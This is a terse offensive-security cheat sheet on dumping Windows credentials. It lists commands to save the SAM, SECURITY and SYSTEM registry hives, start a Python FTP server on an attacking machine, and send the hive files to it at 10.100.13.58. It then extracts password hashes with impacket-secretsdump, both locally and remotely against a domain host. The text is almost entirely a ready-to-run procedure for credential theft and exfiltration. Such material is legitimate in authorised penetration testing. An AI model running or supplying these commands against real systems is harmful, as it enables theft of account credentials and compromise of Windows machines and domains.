Dumping Clear Text Credentials
1.0 Registry Hive local
HKEY_LOCAL_MACHINE/Security/Policy/SecretsNOTE
User needs read permissions for the registry key
reg save hklm\sam c:\temp\sam.save
reg save hklm\security c:\temp\security.save
reg save hklm\system c:\temp\system.saveStarting FTP Server on attacking machine
Python FTP Server PY - python FTP Server
python3 -m pyftpdlib -w --user=haxx --password=0xdeadbeeftransfer files to attacking machine
open 10.100.13.58 2121
user:
pass:
lcd c:\users\user
send sam.save
send security.save
send system.save
quitRead cached credentials with impacket
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL2.0 Registry Hive remote
Admin-Permissions
You need administrative privileges to extract the credentials
Metasploit
Transclude of Metasploit---Cheat-Sheet#impacket-secretsdump
impacket
impacket-secretsdump domain/privUser@192.168.2.1